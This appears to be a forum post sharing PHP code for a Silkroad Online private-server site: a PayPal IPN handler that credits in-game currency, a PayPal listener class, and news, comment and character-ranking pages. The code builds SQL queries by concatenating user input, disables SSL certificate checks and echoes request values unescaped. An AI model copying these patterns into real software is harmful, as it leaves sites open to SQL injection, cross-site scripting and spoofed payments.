        // manually investigate errors from the fraud checking
        $body = "IPN failed fraud checks: \n$errmsg\n\n";
        $body .= $listener->getTextReport();
        mail($personalEmail, 'Paypal Buyer Notice!', $body);
        error_log($body); exit(0);
        
    } else {
    
        $payer_email = ms_escape_string($_POST['payer_email']);
        $mc_gross = ms_escape_string($_POST['mc_gross']);
        $username = ms_escape_string($_POST['custom']);
        $timenow = date("y-m-d H:i:s", time());
        
        $sql = "INSERT INTO paypal (txn_id,payer_email,mc_gross,username,date)VALUES  
                ('$txn_id', '$payer_email', $mc_gross, '$username', '$timenow')"; // Add A logs of buys for server owner [Naty48] .
        
        if (!mssql_query($sql)) {
            error_log(mysql_error());
            exit(0);
        }
        
        //silk update [NATY48]
        $silkAmount = $usdToSilks[(int)$mc_gross];
        mssql_query("exec CGI.CGI_WebPurchaseSilk 0,'$username',0,$silkAmount,0"); // will execute automated in game update of silks.

    }
    
} else {
    // manually investigate the invalid IPN .
  //  mail($personalEmail, 'Invalid IPN', $listener->getTextReport());
}
function ms_escape_string($data) {
        if ( !isset($data) or empty($data) ) return '';
        if ( is_numeric($data) ) return $data;

        $non_displayables = array(
            '/%0[0-8bcef]/',            // url encoded 00-08, 11, 12, 14, 15
            '/%1[0-9a-f]/',             // url encoded 16-31
            '/[\x00-\x08]/',            // 00-08
            '/\x0b/',                   // 11
            '/\x0c/',                   // 12
            '/[\x0e-\x1f]/'             // 14-31
        );
        foreach ( $non_displayables as $regex )
            $data = preg_replace( $regex, '', $data );
        $data = str_replace("'", "''", $data );
        return $data;
    }
?>

ipnlistener

كود PHP:

<?php

class IpnListener {
    
    public $use_curl = true;     
    
    public $force_ssl_v3 = false;     
    
    /**
     *  If true, an SSL secure connection (port 443) is used for the post back 
     *  as recommended by PayPal. If false, a standard HTTP (port 80) connection
     *  is used. Default true.
     *
     *  @var boolean
     */
    public $use_ssl = true;      
    
    /**
     *  If true, the paypal sandbox URI www.sandbox.paypal.com is used for the
     *  post back. If false, the live URI www.paypal.com is used. Default false.
     *
     *  @var boolean
     */
    public $use_sandbox = false; 
    
    /**
     *  The amount of time, in seconds, to wait for the PayPal server to respond
     *  before timing out. Default 30 seconds.
     *
     *  @var int
     */
    public $timeout = 30;       
    
    private $post_data = array();
    private $post_uri = '';     
    private $response_status = '';
    private $response = '';

    const PAYPAL_HOST = 'www.paypal.com';
    const SANDBOX_HOST = 'www.sandbox.paypal.com';
    
    /**
     *  Post Back Using cURL
     *
     *  Sends the post back to PayPal using the cURL library. Called by
     *  the processIpn() method if the use_curl property is true. Throws an
     *  exception if the post fails. Populates the response, response_status,
     *  and post_uri properties on success.
     *
     *  @param  string  The post data as a URL encoded string
     */
    protected function curlPost($encoded_data) {

        if ($this->use_ssl) {
            $uri = 'https://'.$this->getPaypalHost().'/cgi-bin/webscr';
            $this->post_uri = $uri;
        } else {
            $uri = 'http://'.$this->getPaypalHost().'/cgi-bin/webscr';
            $this->post_uri = $uri;
        }
        
        $ch = curl_init();
        
        curl_setopt($ch, CURLOPT_URL, $uri);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $encoded_data);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        
        if ($this->force_ssl_v3) {
            curl_setopt($ch, CURLOPT_SSLVERSION, 3);
        }
        
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        
        $this->response = curl_exec($ch);
        $this->response_status = strval(curl_getinfo($ch, CURLINFO_HTTP_CODE));
        
        if ($this->response === false || $this->response_status == '0') {
            $errno = curl_errno($ch);
            $errstr = curl_error($ch);
            throw new Exception("cURL error: [$errno] $errstr");
        }
    }
    
    /**
     *  Post Back Using fsockopen()
     *
     *  Sends the post back to PayPal using the fsockopen() function. Called by
     *  the processIpn() method if the use_curl property is false. Throws an
     *  exception if the post fails. Populates the response, response_status,
     *  and post_uri properties on success.
     *
     *  @param  string  The post data as a URL encoded string
     */
    protected function fsockPost($encoded_data) {
    
        if ($this->use_ssl) {
            $uri = 'ssl://'.$this->getPaypalHost();
            $port = '443';
            $this->post_uri = $uri.'/cgi-bin/webscr';
        } else {
            $uri = $this->getPaypalHost(); // no "http://" in call to fsockopen()
            $port = '80';
            $this->post_uri = 'http://'.$uri.'/cgi-bin/webscr';
        }

        $fp = fsockopen($uri, $port, $errno, $errstr, $this->timeout);
        
        if (!$fp) { 
            // fsockopen error
            throw new Exception("fsockopen error: [$errno] $errstr");
        } 

        $header .= "POST /cgi-bin/webscr HTTP/1.0\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "Content-Length: ".strlen($encoded_data)."\r\n";
        $header .= "Connection: Close\r\n\r\n";
        
        fputs($fp, $header.$encoded_data."\r\n\r\n");
        
        while(!feof($fp)) { 
            if (empty($this->response)) {
                // extract HTTP status from first line
                $this->response .= $status = fgets($fp, 1024); 
                $this->response_status = trim(substr($status, 9, 4));
            } else {
                $this->response .= fgets($fp, 1024); 
            }
        } 
        
        fclose($fp);
    }
    
    private function getPaypalHost() {
        if ($this->use_sandbox) return IpnListener::SANDBOX_HOST;
        else return IpnListener::PAYPAL_HOST;
    }
    
    /**
     *  Get POST URI
     *
     *  Returns the URI that was used to send the post back to PayPal. This can
     *  be useful for troubleshooting connection problems. The default URI
     *  would be "ssl://www.sandbox.paypal.com:443/cgi-bin/webscr"
     *
     *  @return string
     */
    public function getPostUri() {
        return $this->post_uri;
    }
    
    /**
     *  Get Response
     *
     *  Returns the entire response from PayPal as a string including all the
     *  HTTP headers.
     *
     *  @return string
     */
    public function getResponse() {
        return $this->response;
    }
    
    /**
     *  Get Response Status
     *
     *  Returns the HTTP response status code from PayPal. This should be "200"
     *  if the post back was successful. 
     *
     *  @return string
     */
    public function getResponseStatus() {
        return $this->response_status;
    }
    
    /**
     *  Get Text Report
     *
     *  Returns a report of the IPN transaction in plain text format. This is
     *  useful in emails to order processors and system administrators. Override
     *  this method in your own class to customize the report.
     *
     *  @return string
     */
    public function getTextReport() {
        
        $r = '';
        
        // date and POST url
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n[".date('m/d/Y g:i A').'] - '.$this->getPostUri();
        if ($this->use_curl) $r .= " (curl)\n";
        else $r .= " (fsockopen)\n";
        
        // HTTP Response
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n{$this->getResponse()}\n";
        
        // POST vars
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n";
        
        foreach ($this->post_data as $key => $value) {
            $r .= str_pad($key, 25)."$value\n";
        }
        $r .= "\n\n";
        
        return $r;
    }
    
    /**
     *  Process IPN
     *
     *  Handles the IPN post back to PayPal and parsing the response. Call this
     *  method from your IPN listener script. Returns true if the response came
     *  back as "VERIFIED", false if the response came back "INVALID", and 
     *  throws an exception if there is an error.
     *
     *  @param array
     *
     *  @return boolean
     */    
    public function processIpn($post_data=null) {

        $encoded_data = 'cmd=_notify-validate';
        
        if ($post_data === null) { 
            // use raw POST data 
            if (!empty($_POST)) {
                $this->post_data = $_POST;
                $encoded_data .= '&'.file_get_contents('php://input');
            } else {
                throw new Exception("No POST data found.");
            }
        } else { 
            // use provided data array
            $this->post_data = $post_data;
            
            foreach ($this->post_data as $key => $value) {
                $encoded_data .= "&$key=".urlencode($value);
            }
        }

        if ($this->use_curl) $this->curlPost($encoded_data); 
        else $this->fsockPost($encoded_data);
        
        if (strpos($this->response_status, '200') === false) {
            throw new Exception("Invalid response status: ".$this->response_status);
        }
        
        if (strpos($this->response, "VERIFIED") !== false) {
            return true;
        } elseif (strpos($this->response, "INVALID") !== false) {
            return false;
        } else {
            throw new Exception("Unexpected response from PayPal.");
        }
    }
    
    /**
     *  Require Post Method
     *
     *  Throws an exception and sets a HTTP 405 response header if the request
     *  method was not POST. 
     */    
    public function requirePostMethod() {
        // require POST requests
        if ($_SERVER['REQUEST_METHOD'] && $_SERVER['REQUEST_METHOD'] != 'POST') {
            header('Allow: POST', true, 405);
            throw new Exception("Invalid HTTP request method.");
        }
    }
}
?>

news

كود PHP:

<?php 
global $core;
if(isset($_GET['del']))
{
    $nCommentID = (int)$_GET['del'];
    $isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
    
    if(core::$sql -> numRows("select * from srcms_newscomments where id='$nCommentID' and author='$_SESSION[username]'") > 0 || $isAdmin == "admin")
    {
        core::$sql -> exec ("delete from srcms_newscomments where id='$nCommentID'");
        misc::redirect("?pg=news&comment=$_GET[backid]",0);
    }
    else echo "<br/><br/>You can't delete comment that does not belong to you.";
}


if(!isset($_GET['comment']))
{
    $hQuery = core::$sql -> exec("select * from srcms_news order by id desc");
?>

<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
    <div class="container">
        <div class="span8">    
    <?php 
    while($row = mssql_fetch_array($hQuery))
    {    
        $nComments = core::$sql -> numRows("select * from srcms_newscomments where newsID='$row[id]'");
        $szAvatarUrl = user::getUserAvatarUrl($row['author']);
        $dateee = gmDate('Y-m-d H:i:s');
        $nComments = core::$sql -> getRow("select count(*) from srcms_newscomments where newsID='$row[id]'");
        $userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($row['author'])."'");
        $szUserRank = user::getRankText($userRank);
        $row['content'] =  security::fromHTML($row['content']);
        $row['content'] =  misc::applyAttributesToText($row['content']);
        $datetime = strtotime($row['time']);
        $mssqldate = date("d/m/y", $datetime);?>

<?php if(strtotime($row['time']) > strtotime('last week')) {
    $_NEW = "";
} else {
    $_NEW = "<code>New</code>";
}?>
            <div class="headline">
                <h3>
                    <?php echo $_NEW;?><a href="#" onclick="return false" onmousedown="javascript:toggleSlideBox('NewsID<?php echo $row[id];?>')">
                        <?php echo $row[title];?> <img src="assets/img/expand.png" alt="Toggle" title="Show content" style="position:relative;" />
                    </a> <font size="2">(at <?php echo $mssqldate;?>)</font>
                </h3>
            </div>    
                <small style="display:none;" id="NewsID<?php echo $row[id];?>"><?php echo $row[content];?></small>
                <br />                
<?php 
    }?>
    
            </div>              
    </div>
</div><!--/row-fluid--><!-- End Purchase Block -->
<?php } else {
    $nID = (int)$_GET['comment']; //cast to int .
    if(!isset($_GET['page'])) $_GET['page'] = 1;

    if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
    {
        $getTitle = core::$sql -> getRow("select title from srcms_news where id='$nID'");?>
        
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left"><?php echo $getTitle;?></h1>
        <ul class="pull-right breadcrumb">
            <li><a href="/">Home</a> <span class="divider">/</span></li>
            <li><a href="">News</a> <span class="divider">/</span></li>
            <li class="active"><?php echo $getTitle;?></li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
        
        <?php $hGetComments = core::$sql -> exec("select * from srcms_newscomments where newsID='$nID'");
        
        $commentData = array();
        $a = 0;
        
        while($row = mssql_fetch_array($hGetComments))
        {
            $commentData[$a] = array($row['id'],$row['text'],$row['author'],$row['time']);
            $a++;
        }
        $_GET['page'] = (int)$_GET['page'];
        if(!isset($_GET['page'])) $_GET['page'] = 1;
            for($i = (($_GET['page'] - 1) * 10); $i < (($_GET['page']) * 10);$i++)
            {
                $nCommentID = $commentData[$i][0];
                $szText = $commentData[$i][1];
                $szText = misc::applyAttributesToText($szText);
                $szText = security::fromHTML($szText);
                $szAuthor = $commentData[$i][2];
                $szTime = $commentData[$i][3];
                if(strlen($szText) == 0) break;
                $szAvatar = user::getUserAvatarUrl($szAuthor);
                
                $commentPanelLinks = "";
                
                $isCommentOwner = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($szAuthor)."'");
                
                $isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                
                if($szAuthor == $_SESSION['username'] || $isAdmin == "admin")
                {
                    $commentPanelLinks = "<a href='?pg=news&del=$nCommentID&backid=$nID'><b>Delete</b></a>";
                }
                
                
                $szRank = user::getRankText($isCommentOwner);?>
<div class="media">
    <a class="pull-left" href="#"><img class="media-object" src="<?php echo $szAvatar;?>" alt="<?php echo ucwords($szAuthor);?>"></a>
    <div class="media-body"><h4 class="media-heading"><a href='?pg=viewprofile&username=<?php echo $szAuthor;?>'> <?php echo $szRank; echo" "; echo ucwords($szAuthor);?> </a></h4><?php echo $szText;?><div class="pull-right">Posted at <?php echo $szTime;?> - <?php echo $commentPanelLinks;?></div></div>
</div>
                <hr/>
            <?php }
        

        if($_GET['page'] != 1) echo "<a href='?pg=news&comment=$nID&page=".($_GET['page'] - 1)."'><</a>";
        
        $nPages = 0;
        for($a = 1,$i = 0; $i < count($commentData); $i++)
        {
        if($i % 10 == 0)
        {
            echo "<a href='?pg=news&comment=$nID&page=$a'>$a</a>&nbsp;";
            $a++;
            $nPages++;
        }
        }
        
        if($_GET['page'] < $nPages) echo "<a class='pageblue' href='?pg=news&comment=$nID&page=".($_GET['page'] + 1)."'>></a>";
        
        if(isset($_SESSION['username']))
        {
            if(!isset($_POST['submit']))
            {?>
<br /><form method="post">
    <textarea class="form-control" name="commentText" rows="3" placeholder="Type your message here"></textarea><br>
    <input type="submit" class="btn btn-info" name="submit" value="Submit">
</form>
    <script>CKEDITOR.replace( 'commentText' );</script>
            <?php }
            else
            {

                $cleanText = stripslashes(security::toHTML($_POST['commentText']));
                
                if(strlen($cleanText) < $core -> aConfig['minNewsCommentLen'] || strlen($cleanText) > $core -> aConfig['maxNewsCommentLen'])
                {
                    echo "<br/>Your message is too short or too long. It has to be at least <b>".$core -> aConfig['minNewsCommentLen']."</b> 
                    symbols long, your one is just <b>".strlen($cleanText)."</b> symbols long. Max length is ".$core -> aConfig['maxNewsCommentLen'].".<br/>";
                    misc::back(); 
                }
                else
                {
                $datetime = misc::getDateTime();
                    core::$sql -> exec("insert into srcms_newscomments(newsID, author, text, time) values('$nID','$_SESSION[username]', '$cleanText', '$datetime')");
                    echo "<br/><br/><b>Your comment has been successfully added</b>";
                    misc::redirect("?pg=news&comment=$nID", 1);
                }
            }
        }    else echo "<br/><br/>You must be logged in to post comments";
    }
    else
    echo "<br/>You can't comment news article that doesn't exist.";
}
?>

rank

كود PHP:

<?php
global $core;
switch($_GET['type'])
{

    //Characters Ranking
    
    case('char'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Ranking</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">  
        <?php if(isset($_GET['name']) && security::isSecureString($_GET['name'], 3))
        {
            $nCharID = char::charIDByCharname($_GET['name']);
            if($nCharID == 0)
            {
                echo "There is no character with such nickname<br/>";
            }
            else
            {
                //main
                //switch to acc db
                $szUsername = user::usernameByCharname($_GET['name']);
                $bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
                if($bCanView == 1) //DEBUG >= = =
                {
                    //switch to shd db
                    core::$sql -> changeDB("shard");
                    $hGuild = core::$sql -> getRow("select JobType from _CharTrijob where CharID='$nCharID'");
                    $jobType = char::jobTypeByID($hGuild);
                    $hData = core::$sql -> fetchArray("select * from _Char where CharID='$nCharID'");
                    if(strlen($hData['NickName16']) < 2) $hData['NickName16'] = "<b>None</b>";
                    $ownerStr = null;
                    if($core -> aConfig['allowShowCharOwner'] == 1)
                    {
                        $ownerStr = "<a href='?pg=viewprofile&username=$szUsername' class='color-red'>$szUsername</a>";
                    }                
                    #echo $ownerStr;
                         
/*
                         for character gold add this line :
                         
                         <td>Gold</td><td>$hData[RemainGold]</td></tr> 
 */
                    $nGuildName = guild::guildNameByID($hData['GuildID']);
                    $nCharID = char::charIDByCharname($_GET['name']);
                    core::$sql -> changeDB("log");
                    $charstatus = core::$sql -> exec("select top 1 EventID,EventTime from  _LogEventChar where CharID = '$nCharID' order by EventTime DESC");
                    if(core::$sql -> numRows("select top 1 EventID,EventTime from  _LogEventChar where CharID = '$nCharID' order by EventTime DESC") == 0)
                    {
                    $StatusIS = "<img src='img/status/offline.gif' /> Offline";
                    }
                    else
                    {
                    while($row1 = mssql_fetch_array($charstatus))
                    {
                    $charEvent = $row1['EventID'];
                    switch($charEvent)
                    {
                    case 4:
                    $StatusIS = "<img src='img/status/online.gif' /> <b class='color-green'>Online</b>";
                    break;
                    case 6:
                    $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
                    break;
                    default:
                    $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
                    break;
                    }
                    }
                    }
                    core::$sql -> changeDB("acc");
                    //Tiger Girl
                    $uniquetg = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_CH_TIGERWOMAN' ");
                    //Cerburus
                    $uniqueker = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_EU_KERBEROS' ");
                    //IVY
                    $uniqueivy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_AM_IVY' ");
                    //Uruchi
                    $uniqueuruchi = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_OA_URUCHI' ");
                    //Isy
                    $uniqueisy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_KK_ISYUTARU' ");
                    //Lord Yarkan
                    $uniquelord = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TK_BONELORD' ");
                    //Demon
                    $uniquedemon = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_RM_TAHOMET' ");
                    //SOSO
                    $uniquesoso = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_BLACKSNAKE' ");    

                    $uniquemedusa = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_WHITESNAKE' "); /*
Character Info:
<ul class="unstyled">
    <li>Character <i class="icon-user color-green"></i> <b><?php echo $ownerStr;?></b></li>
</ul><img src='img/character/<?php echo $hData[RefObjID];?>.gif' width='75' height="102"> */?>

<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center"><div align="center">Character Info</div></td>
    </tr>
    <tr>
        <td width="50%">Nick</td>
        <td width="50%"><?php echo $hData[CharName16];?></td>
    </tr>
    <tr>
        <td>Guild</td>
        <td><?php echo $nGuildName;?></td>
    </tr>
    <tr>
        <td>Job</td>
        <td><?php echo $jobType;?></td>
    </tr>
    <tr>
        <td>Player Items </td>
        <td><a href='?pg=rank&type=set_char&name=<?php echo $hData[CharName16];?>'><b class='color-green'><?php echo $hData[CharName16];?></b></a></td>
    </tr>
    <?php /*<tr>
        <td>Health points</td>
        <td><span class='color-red'>&nbsp;&nbsp; <?php echo $hData[HP];?> &nbsp;&nbsp;</span></td>
    </tr>
    <tr>
        <td>Mana points</td>
        <td><span class='color-blue'>&nbsp;&nbsp; <?php echo $hData[MP];?> &nbsp;&nbsp;</span></td>
    </tr>
    <tr>
        <td>Job alias</td>
        <td><?php echo $hData[NickName16];?></td>
    </tr>*/?>
    <tr>
        <td>Level</td>
        <td><?php echo $hData[CurLevel];?></td>
    </tr>
    <?php /*<tr>
        <td>Experience</td>
        <td><?php echo $hData[ExpOffset];?></td>
    </tr>*/?>
    <tr>
        <td>Strength</td>
        <td><?php echo $hData[Strength];?></td>
    </tr>
    <tr>
        <td>Intellect</td>
        <td><?php echo $hData[Intellect];?></td>
    </tr>
    <?php /*<tr>
        <td>Skill points</td>
        <td><?php echo $hData[RemainSkillPoint];?></td>
    </tr>
    <tr>
        <td>Free stat points</td>
        <td><?php echo $hData[RemainStatPoint];?></td>
    </tr>
    <tr>
        <td>Berserker</td>
        <td><?php echo $hData[RemainHwanCount];?>/5</td>
    </tr>*/?>
    <tr>
        <td>Player Status</td>
        <td><?php echo $StatusIS;?></td>
    </tr>
    <tr>
        <td>Last Logout</td>
        <td><?php echo $hData[LastLogout];?></td>
    </tr>
</table>
<br />
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center">Unique Kills (<b class="color-green">No Titans</b>)</div></td>
    <tr>
        <td width="50%">Tiger Girl Kills</td>
        <td width="50%"><?php echo $uniquetg;?></td>
    </tr>
    <tr>
        <td>Cerberus Kills</td>
        <td><?php echo $uniqueker;?></td>
    </tr>
    <tr>
        <td>Captain Ivy</td>
        <td><?php echo $uniqueivy;?></td>
    </tr>
    <tr>
        <td>Uruchi</td>
        <td><?php echo $uniqueuruchi;?></td>
    </tr>
    <tr>
        <td>Isyutaru</td>
        <td><?php echo $uniqueisy;?></td>
    </tr>
    <tr>
        <td>Lord Yarkan</td>
        <td><?php echo $uniquelord;?></td>
    </tr>
    <tr>
        <td>Demon Shaitan</td>
        <td><?php echo $uniquedemon;?></td>
    </tr>
    <tr>
        <td>SoSo The Black Viper</td>
        <td><?php echo $uniquesoso;?></td>
    </tr>
    <tr>
        <td>BeakYung The White Viper (Medusa)</td
        ><td><?php echo $uniquemedusa;?></td>
    </tr>
</table>
            <?php core::$sql -> changeDB('acc');
            if(core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]'") == 0)
            {
            echo "This character has no uniques kills!";
            }
            else
            {?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center">Latest Unique Kills by (<b class="color-green"><?php echo $hData[CharName16];?></b>)</div></td>
    </tr>
        <td width="50%"><b>Unique name</b></td>
        <td width="50%"><b>Time</b></td>    
    <tr>
            <?php $hQuery = core::$sql -> exec("select top 30 * from Evangelion_uniques where CharName='$hData[CharName16]' order by time desc");
            while($row = mssql_fetch_array($hQuery))
            {
                $datetime1 = strtotime($row['time']);
                $mssqldate1 = date("d-m-y", $datetime1);
                echo "<tr>";
                $UniqueType = $row['MobName'];
                switch($UniqueType) {
                // Tiger Girl
                case "MOB_CH_TIGERWOMAN":
                echo '<td>Tiger Girl</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_CH_TIGERWOMAN_L3":
                echo '<td>Tiger Girl (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                // XXX
                case "MOB_OA_URUCHI":
                echo '<td>Uruchi</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_KK_ISYUTARU":
                echo '<td>Isyutaru</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TK_BONELORD":
                echo '<td>Lord Yarkan</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_EU_KERBEROS":
                echo '<td>Cerberus</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_AM_IVY":
                echo '<td>Captain Ivy</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_RM_TAHOMET":
                echo '<td>Demon Shaitan</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_KK_ISYUTARU_L3":
                echo '<td>Isyutaru (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TK_BONELORD_L3":
                echo '<td>Lord Yarkan (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_RM_TAHOMET_L3":
                echo '<td>Demon Shaitan (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_EU_KERBEROS_L3":
                echo '<td>Cerberus (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_AM_IVY_L3":
                echo '<td>Captain Ivy (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_OA_URUCHI_L3":
                echo '<td>Uruchi (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TQ_BLACKSNAKE_L3":
                echo '<td>SoSo The Hades Viper (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                default:
                break;
                }
                echo "</tr>";
            }?>
</table>

            <?php core::$sql -> changeDB('shard');
            }
            #misc::back();
            } else echo "Owner of account on which this character is created didn't want you to view he's (her) data.<br/>";
            }
            } 
            else 
            {
            core::$sql -> changeDB("shard");
            $hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 not like '%[GM]%' order by CurLevel desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width='10%' align='center' class='thead'><b>#</b></td>
        <td width='10%' align='center' class='thead'><b>Race</b></td>
        <td width='30%' align='center' class='thead'><b>Charname</b></td>
        <td width='20%' align='center' class='thead'><b>Level</b></td>
        <!--td width='15%' align='center' class='thead'><b>SP</td-->
        <td width='15%' align='center' class='thead'><b>Strength</b></td>
        <td width='15%' align='center' class='thead'><b>Intellect</b></td>
    </tr>
            <?php $n = 1;
            while($row = mssql_fetch_array($hQuery))
            {
                
                $szUsername = user::usernameByCharname($row['CharName16']);
                $bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
                if($bCanView > 0)
                {
                    
                $icon = "";
                    if($row['RefObjID'] < 3000) $icon = "<img src='img/Character/race_china.png'>";
                    else $icon="<img src='img/Character/race_euro.png'>";?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><?php echo $icon;?></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
        <td align='center'><?php echo $row[CurLevel];?></td>
        <?php /*<td align='center'><?php echo $row[RemainSkillPoint];?></td> */ ?>
        <td align='center'><?php echo $row[Strength];?></td>
        <td align='center'><?php echo $row[Intellect];?></td>
    </tr>
                    <?php $n++;
                }
            }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
    }
    break;
    
    //Search Character Script.
    
    case('search_char'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Search Character</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Search Character</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php if(!isset($_POST['searchfor']))
        {?>
<form method='post' class="reg-page">
Max results: 50!<br />
    Charname: <input type='text' name='searchfor' maxlength='16' placeholder='Search Character'>
<br />
    <input type='submit' name='submit' value='Search' class="btn-u" >
</form>
        <?php }
        else
        {
            $bExit = false;
            if(!security::isSecureString($_POST['searchfor'], 3))
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name contains forbidden symbols!</span>
        <?php }
            if(strlen($_POST['searchfor']) == 0)
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name can't be 0 symbols long!</span>
        <?php }
            if(strlen($_POST['searchfor']) > 16)
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name too long!</span>
        <?php }
            
            if(!$bExit)
            {
                echo "<br />";
                core::$sql -> changeDB('shard');
                $hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 like '%$_POST[searchfor]%'");
                $nResults = 0;?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>Char name</td>
    </tr>
                <?php while($row = mssql_fetch_array($hQuery))
                {?>
    <tr>
        <td><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
    </tr>
                    <?php $nResults++;
                }?>
</table>
                <?php if($nResults > 0) 
                {?>
                <br /><div class="pull-left">Found [<b class="color-green"><?php echo $nResults;?></b>] characters!</div><br />
                <div class="pull-right"><?php echo misc::back();?></div><br />
</table>
                <?php }
                else echo '<div class="pull-left"> No characters found </div><br /><br /><br />';
            }
        }
        #echo "<br /><br />";
        #misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }
    break;
    
    //Search Guild System
    
    case('search_guild'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Search Guild</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Search Guild</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('shard');
        if(!isset($_POST['search_for']))
        {?>

<form method='post' class="reg-page"> 
    Guild name: <input type='text' name='search_for' maxlength='16' placeholder='Search Guild'><br />
    <input type='submit' name='submit' value='Search' class="btn-u" >
</form>
        <?php }
        else
        {    
            $bExit = false;
            if(!security::isSecureString($_POST['search_for'], 3))
            {
